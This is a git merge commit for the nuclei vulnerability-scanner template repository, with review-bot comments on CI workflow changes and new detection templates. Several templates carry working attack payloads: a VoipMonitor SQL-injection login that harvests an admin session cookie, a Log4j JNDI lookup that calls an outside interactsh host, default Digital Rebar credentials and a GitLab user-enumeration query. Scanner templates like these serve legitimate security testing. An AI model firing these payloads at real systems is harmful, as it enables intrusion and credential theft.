Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-03-07 08:10:22 -05:00 committed by GitHub
commit 21d872d42c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
19 changed files with 1761 additions and 1417 deletions


@ -10,23 +10,25 @@ jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/checkout@v2
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
@ -44,4 +46,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: ${{ github.ref }}
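Review bot: Replacing the explicit checkout configuration with a bare `actions/checkout@v2` (L21) drops `persist-credentials: false`, so the job's GITHUB_TOKEN stays in `.git/config` for every later step — including the `cve-annotate` binary that is `sudo unzip`ped straight from a release download with no checksum check, and on the fallback path a build from the unpinned `@dev` ref. Nothing here needs the persisted credential, since `ad-m/github-push-action` receives the token explicitly via `github_token`, so keep `persist-credentials: false` on the new checkout step. `actions/checkout@v2` and `ad-m/github-push-action@master` are both mutable refs; pinning them to full commit SHAs is the usual mitigation for a workflow that pushes back into the repository. Whether the other lines in this hunk (the tag lookup and the release download) are new or context is not recoverable from the rendered view.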


@ -6,25 +6,17 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v2
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
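Review bot: The new `Get Github tag` step at L75 calls the GitHub API unauthenticated with `curl --silent` and no `--fail`, so a rate-limited or error response (`{"message": ...}`) makes `jq -r .tag_name` print the string `null`, which passes the `!= ''` guard at L78 and becomes a download of `releases/download/null/nuclei_ull_linux_amd64.zip` (note `${VERSION:1}`). The `github-script` step it replaces used the job token and therefore a far higher rate limit; if curl is preferred, harden it as `curl -fsS -H "Authorization: Bearer $GITHUB_TOKEN" ... | jq -r '.tag_name // empty'` with the token supplied through `env`. Separately, the archive fetched at L83 is installed with `sudo unzip` and executed without any integrity check; if the release publishes a checksums file, verifying the zip against it before unzipping would close that gap.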


@ -1,46 +1,3 @@
cnvd/2019/CNVD-2019-19299.yaml
cnvd/2019/CNVD-2019-32204.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cnvd/2022/CNVD-2022-03672.yaml
cves/2017/CVE-2017-18598.yaml
cves/2018/CVE-2018-16716.yaml
cves/2018/CVE-2018-18264.yaml
cves/2018/CVE-2018-19365.yaml
cves/2019/CVE-2019-9726.yaml
cves/2020/CVE-2020-35234.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2021/CVE-2021-44521.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-22536.yaml
cves/2022/CVE-2022-22947.yaml
cves/2022/CVE-2022-23134.yaml
cves/2022/CVE-2022-24124.yaml
exposed-panels/casdoor-login.yaml
exposed-panels/digitalrebar-login.yaml
exposed-panels/directum-login.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/issabel-login.yaml
exposed-panels/librenms-login.yaml
exposed-panels/ocs-inventory-login.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
exposed-panels/subrion-login.yaml
exposures/configs/prometheus-metrics.yaml
misconfiguration/gitlab/gitlab-uninitialized-password.yaml
technologies/empirecms-detect.yaml
technologies/jeecg-boot-detect.yaml
technologies/livehelperchat-detect.yaml
technologies/microweber-detect.yaml
technologies/php-fusion-detect.yaml
technologies/piwigo-detect.yaml
technologies/snipeit-panel.yaml
technologies/subrion-cms-detect.yaml
token-spray/api-launchdarkly.yaml
vulnerabilities/cisco/cucm-username-enumeration.yaml
vulnerabilities/other/microweber-xss.yaml
vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
vulnerabilities/wordpress/wp-adaptive-xss.yaml
vulnerabilities/wordpress/wp-qards-listing.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
**221 directories, 3173 files**.
**222 directories, 3221 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |


@ -1,7 +1,7 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
name: Zhiyuan A8 Arbitrary File Write (RCE)
author: daffainfo
severity: critical
reference:


@ -0,0 +1,56 @@
id: CVE-2019-10405
info:
name: Diagnostic page exposed Cookie HTTP header
severity: medium
author: c-sh0
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-10405
cwe-id: CWE-200
tags: cve,cve2019,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'JSESSIONID'
condition: and
extractors:
- type: kval
kval:
- x_jenkins
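Review bot: The header matcher at L246 uses an unsuffixed `part: header` inside a two-request `req-condition: true` template, while the body matcher is explicitly `body_2`; which response the unsuffixed part resolves to is not evident from the template itself, so `part: header_2` (or `header_1`) would make the intent explicit instead of relying on the engine default. The weakness being tested is the page echoing the requester's own `Cookie` header, so `JSESSIONID` can only show up in `body_2` if the first response set that cookie and `cookie-reuse` replayed it; a comment on the second request such as `# replays the JSESSIONID set by request 1; a vulnerable /whoAmI/ echoes it back` would explain why two identical GETs are needed. The `PR:L` in the CVSS vector is NVD's rating, but the check itself runs unauthenticated, which is worth a note so nobody adds credentials thinking they are required.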


@ -0,0 +1,56 @@
id: CVE-2020-2103
info:
name: Diagnostic page exposed session cookies
severity: medium
author: c-sh0
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2020-2103
cwe-id: CWE-200
tags: cve,cve2020,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'SessionId: null'
condition: and
extractors:
- type: kval
kval:
- x_jenkins
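Review bot: The body matcher at L309 requires the literal `SessionId: null`, which reads as the session identifier being absent rather than exposed; the referenced advisory describes affected versions printing the session ID on the whoAmI details object, so a vulnerable instance would presumably show a real identifier there, and `null` may be what a patched instance prints. Please confirm against a 2.218 and a 2.219 instance before merging; if the vulnerable output is the actual ID, a regex such as `SessionId: [A-Za-z0-9]+` (or a DSL check that the `JSESSIONID` value set by the first response appears in `body_2`) would match the exposure rather than its absence. As in the CVE-2019-10405 template, `part: header` at L299 is unsuffixed in a `req-condition` template and would be clearer as `header_2`.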


@ -0,0 +1,49 @@
id: CVE-2021-4191
info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-4191
cwe-id: CWE-359
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: */*
Origin: {{RootURL}}
Referer: {{RootURL}}/-/graphql-explorer
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"data"'
- '"users"'
- '"nodes"'
- '"id"'
- 'gid://'
condition: and
- type: status
status:
- 200
extractors:
- type: json
json:
- '.data.users.nodes[].username'
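Review bot: The CVSS vector at L329 is malformed — `CVSS:5.3/...` puts the score where the specification version belongs, so tooling that parses the vector will reject it; it should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`, which is the 5.3 vector the score line already states. The request body at L343 carries the whole GraphiQL welcome comment; `{"query":"{ users { nodes { id name username } } }","variables":null,"operationName":null}` is equivalent, since `#` lines are ignored by the GraphQL parser, and far easier to audit. The description mentions email addresses but the query does not request `email`, which is fine for detection and worth stating so nobody expects it in the extractor output.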


@ -0,0 +1,27 @@
id: CVE-2022-0692
info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0692
cwe-id: CWE-601
tags: cve,cve2022,redirect,rudloff,alltube
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -53,7 +53,7 @@ requests:
- type: word
part: body
words:
- "400 Bad Request" # error in concatenated response
- "500 Internal Server Error"
- "500 Dispatching Error"
- "HTTP/1.0 400 Bad Request" # error in concatenated response
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
condition: or
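Review bot: The new words at L400–L402 pin the status line to `HTTP/1.0`, so a concatenated second response emitted as `HTTP/1.1 400 Bad Request` would no longer match; if the goal is to require a full status line inside the body (so ordinary error pages containing the phrase are not matched) rather than that specific protocol version, a regex matcher `HTTP/1\.[01] (400 Bad Request|500 Internal Server Error|500 Dispatching Error)` keeps the precision without the version dependency. The enclosing request and the `matchers-condition` this list sits under start outside this hunk, so how this matcher combines with the others is not visible here.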


@ -0,0 +1,43 @@
id: CVE-2022-23779
info:
name: Zoho ManageEngine - Internal Hostname Disclosure
author: cckuailong
severity: medium
description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
reference:
- https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
- https://github.com/fbusr/CVE-2022-23779
- https://nvd.nist.gov/vuln/detail/CVE-2022-23779
metadata:
fofa-query: app="ZOHO-ManageEngine-Desktop"
tags: cve,cve2022,zoho,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/themes"
matchers-condition: and
matchers:
- type: status
status:
- 301
- type: word
part: header
words:
- '/themes/'
- 'text/html'
condition: and
- type: dsl
dsl:
- '!contains(location,host)'
extractors:
- type: regex
part: header
group: 1
regex:
- 'https?:\/\/(.*):'
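Review bot: The extractor regex at L444, `https?:\/\/(.*):`, only captures when a `:` follows the host in the `Location` header, so a redirect to `https://internal-host/themes/` with no explicit port is reported by the matchers but yields no extracted hostname, and because `.*` is greedy, any later colon on the line pushes the capture to the last `:`. `https?:\/\/([^/:\s]+)` captures just the host part in both cases. The DSL matcher at L438 is a sensible exposure test, but `!contains(location,host)` also fires on a canonical-host redirect from a proxy in front of the product; the `301` plus `/themes/` requirements narrow that, and a comment such as `# Location names a host other than the one scanned -> leaked internal name` would document the intent.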


@ -0,0 +1,47 @@
id: CVE-2022-24260
info:
name: VoipMonitor - Pre-Auth SQL injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
reference:
- https://kerbit.io/research/read/blog/3
- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
- https://www.voipmonitor.org/changelog-gui?major=5
metadata:
shodan-query: http.title:"VoIPmonitor"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 9.80
cve-id: CVE-2022-24260
cwe-id: CWE-89
tags: cve,cve2022,voipmonitor,sqli,unauth
requests:
- raw:
- |
POST /api.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
matchers-condition: and
matchers:
- type: word
words:
- '"success":true'
- '_vm_version'
- '_debug'
condition: and
- type: status
status:
- 200
extractors:
- type: kval
kval:
- PHPSESSID
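Review bot: The request at L474 does more than detect the injection — a successful UNION logs the scanner in as `admin`, and the `PHPSESSID` extractor at L489 then writes a live administrator session cookie into the scan output; that is an exploitation step and should be stated, e.g. a comment on the payload `# creates an admin session on the target; the extracted PHPSESSID is a valid credential, handle output accordingly`, plus a tag operators can use to exclude it instead of it reading as a plain `sqli` check. The classification is internally inconsistent: `C:H/I:N/A:N` scores 7.5, not the 9.80 at L463; 9.8 corresponds to `C:H/I:H/A:H`, which appears to be NVD's vector for this CVE and fits escalation to the Administrator level. The column count in the UNION is tied to the schema of one GUI version, which is worth a comment so a silent non-match elsewhere is not mistaken for "not vulnerable".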


@ -0,0 +1,40 @@
id: digitalrebar-default-login
info:
name: RackN Digital Rebar provision default login
author: c-sh0
severity: high
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
tags: rackn,digitalrebar,default-login
requests:
- raw:
- |
GET /api/v3/users HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
payloads:
username:
- rocketskates
password:
- r0cketsk8ts
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: header
regex:
- '(?i)(X-Drp-)'
- type: word
part: body
words:
- 'Name'
- 'Secret'
condition: and
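Review bot: The template has no `description`, and `reference` at L499 is a bare string where the other templates in this commit use a list; writing it as `reference:` followed by `- https://docs.rackn.io/...` keeps the format uniform, and a one-line `description: Checks the documented default rocketskates credentials against the Digital Rebar Provision API` tells the reader what a hit means. The body matcher at L525 requires `Name` and `Secret`, which implies a successful `/api/v3/users` listing returns secret fields; a comment on that matcher saying a match means the user list, secrets included, was retrieved with default credentials would make the `high` severity self-explanatory. With a single value per payload, `attack: pitchfork` at L512 is redundant but harmless.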


@ -1,32 +1,39 @@
id: jenkins-detect
info:
name: Jenkins detect (version)
author: philippdelteil,daffainfo
name: Jenkins Detection
author: philippdelteil,daffainfo,c-sh0
severity: info
reference:
- https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion
- https://github.com/jenkinsci/jenkins/pull/470
- https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread
metadata:
shodan-query: http.favicon.hash:81586312
tags: tech,jenkins
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/whoAmI/"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "X-Jenkins"
- "X-Jenkins-Session"
part: header
condition: and
words:
- "x-jenkins"
case-insensitive: true
- type: word
words:
- "<title>Dashboard [Jenkins]</title>"
part: body
- "Jenkins"
extractors:
- type: kval
part: header
kval:
- x_jenkins
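Review bot: With `redirects: true` at L551 and nothing restricting where the redirect may lead, the `X-Jenkins` header and the version the `kval` extractor at L571 reports can come from a different host than the one scanned if the instance bounces to a central Jenkins; if the engine in use can restrict to same-host redirects that is safer for a fingerprint, otherwise a comment noting the caveat is worthwhile. The body matcher at L569 now only requires the word `Jenkins` and, joined by `and` with the `x-jenkins` header check, adds little beyond it — acceptable for a detect template, but a comment would make clear the loosening from `<title>Dashboard [Jenkins]</title>` is deliberate. Per the newly referenced permissions document, `/whoAmI/` is reachable without Overall/Read, which is why it makes sense as a second path; `# fallback reachable without Overall/Read when the root redirects to login` on L550 would capture that.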


@ -1,7 +1,7 @@
id: cucm-username-enumeration
info:
name: Cisco Unified Call Manager (CUCM) User Data Services Username Enumeration API - Unauthenticated
name: Cisco Unified Call Manager Username Enumeration
author: manasmbellani
severity: medium
reference: https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/


@ -0,0 +1,41 @@
id: vrealize-operations-log4j-rce
info:
name: vRealize Operations Tenant App Log4j JNDI RCE
author: bughuntersurya
severity: critical
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
requests:
- raw:
- |
POST /suite-api/api/auth/token/acquire HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns" # Confirms the DNS Interaction
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
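Review bot: The regex matcher at L618 is satisfied by any name with four dot-separated labels, which every interactsh DNS query has, so it confirms nothing beyond the `dns` protocol matcher above it; and because `[a-zA-Z0-9\.\-]+` is greedy, group 1 of the extractor at L624 is "everything except the last three labels", which on a self-hosted interactsh domain with a longer suffix would include part of the correlation id rather than just the leaked `${hostName}`. If the interactsh base domain is fixed, anchoring the regex on it is the robust fix; otherwise a comment stating the assumption (`# assumes <hostname>.<id>.<domain>.<tld>; adjust for self-hosted OAST domains`) is the minimum. The template also omits a `classification` block with `cve-id: CVE-2021-44228` and the `cve2021`/`jndi` tags, which would allow filtering by CVE.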